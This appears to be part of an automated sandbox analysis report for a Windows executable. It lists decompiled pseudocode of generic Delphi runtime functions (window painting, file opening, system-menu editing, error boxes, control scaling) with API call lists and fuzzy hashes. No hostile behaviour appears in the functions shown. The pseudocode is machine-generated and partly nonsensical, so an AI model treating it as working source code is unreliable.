                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Color$CriticalSection$EnterObjectSelectStretchText$A590DeleteLeave
                                                                                • String ID:
                                                                                • API String ID: 2975480410-0
                                                                                • Opcode ID: 8fade14a0b8bb6aa5a3d00aa6ebabbc3893095b24b0ee73f5b28fa93de154169
                                                                                • Instruction ID: 56eeb733055bb1c0b9ac4d539382dbe7af899076f26b7cfa990cf846c4f30ea4
                                                                                • Opcode Fuzzy Hash: 8fade14a0b8bb6aa5a3d00aa6ebabbc3893095b24b0ee73f5b28fa93de154169
                                                                                • Instruction Fuzzy Hash: 3591C675A00118EFCB40EFA9D981E9EBBF8EF0D304B5544AAF508EB251C638ED45CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00439BC0, Relevance: 15.2, APIs: 10, Instructions: 177windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00439BC0(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E00413FA4( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041E68C(0x80000010));
							E00412984( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041E68C(0x80000014));
							E00412984( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E00414000(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E00413FA4( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00412984( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E00433FDC(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E00436848(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}
















                                                                                0x00439bc4
                                                                                0x00439bc7
                                                                                0x00439bc9
                                                                                0x00439bcb
                                                                                0x00439bd4
                                                                                0x00439bf2
                                                                                0x00439bf2
                                                                                0x00439bf5
                                                                                0x00439bfd
                                                                                0x00439ce2
                                                                                0x00439ce2
                                                                                0x00439cea
                                                                                0x00439def
                                                                                0x00439def
                                                                                0x00439def
                                                                                0x00439cf3
                                                                                0x00439cf6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439cfd
                                                                                0x00439d01
                                                                                0x00439d03
                                                                                0x00439d0b
                                                                                0x00439d10
                                                                                0x00439d19
                                                                                0x00439d53
                                                                                0x00439d76
                                                                                0x00439d81
                                                                                0x00439d8b
                                                                                0x00439da0
                                                                                0x00439dc3
                                                                                0x00439dce
                                                                                0x00439dd8
                                                                                0x00439dd8
                                                                                0x00439ddd
                                                                                0x00439dde
                                                                                0x00439dde
                                                                                0x00439dde
                                                                                0x00000000
                                                                                0x00439d03
                                                                                0x00439c03
                                                                                0x00439c07
                                                                                0x00439c10
                                                                                0x00439c14
                                                                                0x00439c16
                                                                                0x00439c16
                                                                                0x00439c14
                                                                                0x00439c21
                                                                                0x00439c27
                                                                                0x00439c2d
                                                                                0x00439c3a
                                                                                0x00439c40
                                                                                0x00439c6e
                                                                                0x00439c80
                                                                                0x00439c86
                                                                                0x00439c88
                                                                                0x00439c88
                                                                                0x00439c94
                                                                                0x00439ca0
                                                                                0x00439cb2
                                                                                0x00439cc2
                                                                                0x00439ccd
                                                                                0x00439cd2
                                                                                0x00439cd2
                                                                                0x00439c80
                                                                                0x00439cd8
                                                                                0x00439cd9
                                                                                0x00439c2d

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                • String ID:
                                                                                • API String ID: 375863564-0
                                                                                • Opcode ID: 90185039d72083636e0d9542b1f8aeae172046c567a2dd13c7c3ec0bbf9e28ba
                                                                                • Instruction ID: ceb3e369153146217064650c0b56690f9fbafe8079a4cddf4b1ed266614cb7ac
                                                                                • Opcode Fuzzy Hash: 90185039d72083636e0d9542b1f8aeae172046c567a2dd13c7c3ec0bbf9e28ba
                                                                                • Instruction Fuzzy Hash: F4517F712042449FDB18EF29C8C4B9B77E8AF49308F04545EFD89CB296D678EC45CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402B18, Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 70%
                                                                                			E00402B18(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402a6c;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402AAC;
				}
				_t59[9] = E00402AF8;
				_t59[8] = E00402AA8;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402AA8;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x4873e4) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402AAC;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                                                0x00402b19
                                                                                0x00402b1d
                                                                                0x00402b20
                                                                                0x00402b2c
                                                                                0x00402b39
                                                                                0x00402b3e
                                                                                0x00402b43
                                                                                0x00402b48
                                                                                0x00402b2e
                                                                                0x00402b2f
                                                                                0x00402b51
                                                                                0x00402b56
                                                                                0x00402b5b
                                                                                0x00402b31
                                                                                0x00402b32
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402b62
                                                                                0x00402b67
                                                                                0x00402b6c
                                                                                0x00402b6c
                                                                                0x00402b71
                                                                                0x00402b71
                                                                                0x00402b78
                                                                                0x00402b7f
                                                                                0x00402b8a
                                                                                0x00402c48
                                                                                0x00402c4f
                                                                                0x00402c56
                                                                                0x00402c5f
                                                                                0x00402c6b
                                                                                0x00402c71
                                                                                0x00402c6d
                                                                                0x00402c6d
                                                                                0x00402c6d
                                                                                0x00402c61
                                                                                0x00402c61
                                                                                0x00402c61
                                                                                0x00402c73
                                                                                0x00402c7b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402c7d
                                                                                0x00000000
                                                                                0x00402b90
                                                                                0x00402ba0
                                                                                0x00402ba8
                                                                                0x00402cb6
                                                                                0x00402cb6
                                                                                0x00000000
                                                                                0x00402cbc
                                                                                0x00402bae
                                                                                0x00402bb6
                                                                                0x00402c7f
                                                                                0x00402c85
                                                                                0x00402c9e
                                                                                0x00000000
                                                                                0x00402c9e
                                                                                0x00402c89
                                                                                0x00402c90
                                                                                0x00402ca4
                                                                                0x00402ca9
                                                                                0x00000000
                                                                                0x00402caf
                                                                                0x00402c95
                                                                                0x00402c97
                                                                                0x00402c97
                                                                                0x00000000
                                                                                0x00402c95
                                                                                0x00402bbc
                                                                                0x00402bc9
                                                                                0x00402bca
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402bd0
                                                                                0x00402bd5
                                                                                0x00402bd7
                                                                                0x00402bd7
                                                                                0x00402be6
                                                                                0x00000000
                                                                                0x00402bec
                                                                                0x00402c01
                                                                                0x00402c06
                                                                                0x00402c08
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402c0e
                                                                                0x00402c10
                                                                                0x00402c1c
                                                                                0x00402c30
                                                                                0x00000000
                                                                                0x00402c40
                                                                                0x00000000
                                                                                0x00402c40
                                                                                0x00402c30
                                                                                0x00402c1e
                                                                                0x00402c1e
                                                                                0x00000000
                                                                                0x00402c10
                                                                                0x00402be6

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BA0
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BC4
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BE0
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402C01
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402C2A
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402C38
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00402C73
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 00402C89
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402CA4
                                                                                • GetLastError.KERNEL32(000000F5), ref: 00402CBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: 64ad8ea4c2b16f1e38e7f37a0d7e461a096d8fcf753019cf723aaf91f24c5d7a
                                                                                • Instruction ID: c7a4ebb683dc642720d6c14f3ce292b160b37a6f3a2b11c4ffb55bc8aa658509
                                                                                • Opcode Fuzzy Hash: 64ad8ea4c2b16f1e38e7f37a0d7e461a096d8fcf753019cf723aaf91f24c5d7a
                                                                                • Instruction Fuzzy Hash: 1D41A170108700AAF7309F24CB0DB2B76E5AB41754F208A3FE596B66E0E7FDA841974D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00450F98, Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00450F98(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E0043BD14( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}





                                                                                0x00450f9f
                                                                                0x00450fa9
                                                                                0x00450fb2
                                                                                0x00450fbc
                                                                                0x00450fc5
                                                                                0x00450fcf
                                                                                0x00450fe8
                                                                                0x00450ff7
                                                                                0x00451001
                                                                                0x0045100e
                                                                                0x0045101b
                                                                                0x00451028
                                                                                0x00451035
                                                                                0x00451042
                                                                                0x00000000
                                                                                0x0045104f
                                                                                0x00451063
                                                                                0x0045106d
                                                                                0x0045106d
                                                                                0x00451075
                                                                                0x0045107f
                                                                                0x00000000
                                                                                0x00451089
                                                                                0x0045107f
                                                                                0x00450fcf
                                                                                0x00450fbc
                                                                                0x00451090

                                                                                APIs
                                                                                • GetSystemMenu.USER32(00000000,00000000), ref: 00450FE3
                                                                                • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00451001
                                                                                • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045100E
                                                                                • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045101B
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451028
                                                                                • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00451035
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00451042
                                                                                • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0045104F
                                                                                • EnableMenuItem.USER32 ref: 0045106D
                                                                                • EnableMenuItem.USER32 ref: 00451089
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Menu$Delete$EnableItem$System
                                                                                • String ID:
                                                                                • API String ID: 3985193851-0
                                                                                • Opcode ID: ffa875bfd80362b43f77e1a8893f16d689354b82d48917cc9e02a79fef38a4fe
                                                                                • Instruction ID: 0d157b5141c4730fac339518274e379f240c5fea68c2b1bb01df9476f5004e56
                                                                                • Opcode Fuzzy Hash: ffa875bfd80362b43f77e1a8893f16d689354b82d48917cc9e02a79fef38a4fe
                                                                                • Instruction Fuzzy Hash: 49218B703803447AF730AA24DC8EF697BD85F04B19F0180A5BA457F2E3C6B8E9D0964C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409FFC, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50filewindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409FFC(void* __edi) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t10;
				char* _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				long _t26;
				void* _t34;

				E00409E74(_t10,  &_v1024, _t34, 0x400);
				_t12 =  *0x486cc4; // 0x487048
				if( *_t12 == 0) {
					_t14 =  *0x486aa8; // 0x4074e4
					_t7 = _t14 + 4; // 0xffe8
					_t16 =  *0x487714; // 0x400000
					LoadStringA(E00405A84(_t16),  *_t7,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t22 =  *0x486af0; // 0x487218
				E00402D0C(_t22);
				_t26 = E00408B40( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff5), 0x40a0ac, 2,  &_v1092, 0);
			}













                                                                                0x0040a00b
                                                                                0x0040a010
                                                                                0x0040a018
                                                                                0x0040a06b
                                                                                0x0040a070
                                                                                0x0040a074
                                                                                0x0040a07f
                                                                                0x00000000
                                                                                0x0040a095
                                                                                0x0040a01a
                                                                                0x0040a01f
                                                                                0x0040a02f
                                                                                0x0040a042
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00409E74: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409E91
                                                                                  • Part of subcall function 00409E74: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EB5
                                                                                  • Part of subcall function 00409E74: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409ED0
                                                                                  • Part of subcall function 00409E74: LoadStringA.USER32 ref: 00409F66
                                                                                • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A03C
                                                                                • WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A042
                                                                                • GetStdHandle.KERNEL32(000000F5,0040A0AC,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A057
                                                                                • WriteFile.KERNEL32(00000000,000000F5,0040A0AC,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A05D
                                                                                • LoadStringA.USER32 ref: 0040A07F
                                                                                • MessageBoxA.USER32 ref: 0040A095
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
                                                                                • String ID: HpH$t@
                                                                                • API String ID: 1802973324-3679897340
                                                                                • Opcode ID: e34cdb547f107c02dac129002a15a92a112cff8d4a5bdf1f3d81973431fedd85
                                                                                • Instruction ID: 7d280b318de20257b267b25c9c6113f965e65ab47ef070ee4e671aee89c3a216
                                                                                • Opcode Fuzzy Hash: e34cdb547f107c02dac129002a15a92a112cff8d4a5bdf1f3d81973431fedd85
                                                                                • Instruction Fuzzy Hash: 7501A1B2244305BAD700FB64CC42F9B77ACAB05704F408A3E7355F60E2DA78E9008B2B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004352BC, Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004352BC(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x435468; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x435460; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x435468; // 0x0
				if(_t113 != (_t107 &  *0x435464)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x435468; // 0x0
				if(_t114 != (_t107 &  *0x43546c)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E0041EDEC( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041EDD0( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













                                                                                0x004352c3
                                                                                0x004352c6
                                                                                0x004352c8
                                                                                0x004352cd
                                                                                0x0043544a
                                                                                0x0043544a
                                                                                0x0043544f
                                                                                0x0043545c
                                                                                0x0043545c
                                                                                0x004352d7
                                                                                0x004352e1
                                                                                0x004352d9
                                                                                0x004352d9
                                                                                0x004352d9
                                                                                0x004352ea
                                                                                0x004352fe
                                                                                0x004352ec
                                                                                0x004352fa
                                                                                0x004352fa
                                                                                0x00435304
                                                                                0x0043531d
                                                                                0x00435306
                                                                                0x00435314
                                                                                0x00435314
                                                                                0x00435324
                                                                                0x0043535e
                                                                                0x00435361
                                                                                0x0043532c
                                                                                0x0043532f
                                                                                0x00435353
                                                                                0x00435358
                                                                                0x00435331
                                                                                0x00435342
                                                                                0x00435344
                                                                                0x00435344
                                                                                0x0043532f
                                                                                0x00435368
                                                                                0x0043536d
                                                                                0x004353b1
                                                                                0x00435375
                                                                                0x0043537d
                                                                                0x004353a8
                                                                                0x0043537f
                                                                                0x00435394
                                                                                0x00435394
                                                                                0x0043537d
                                                                                0x004353c9
                                                                                0x004353d7
                                                                                0x004353df
                                                                                0x004353f2
                                                                                0x004353f2
                                                                                0x00435400
                                                                                0x00435408
                                                                                0x0043541b
                                                                                0x0043541b
                                                                                0x00435425
                                                                                0x00435445
                                                                                0x00435445
                                                                                0x00000000

                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 004352F5
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 0043530F
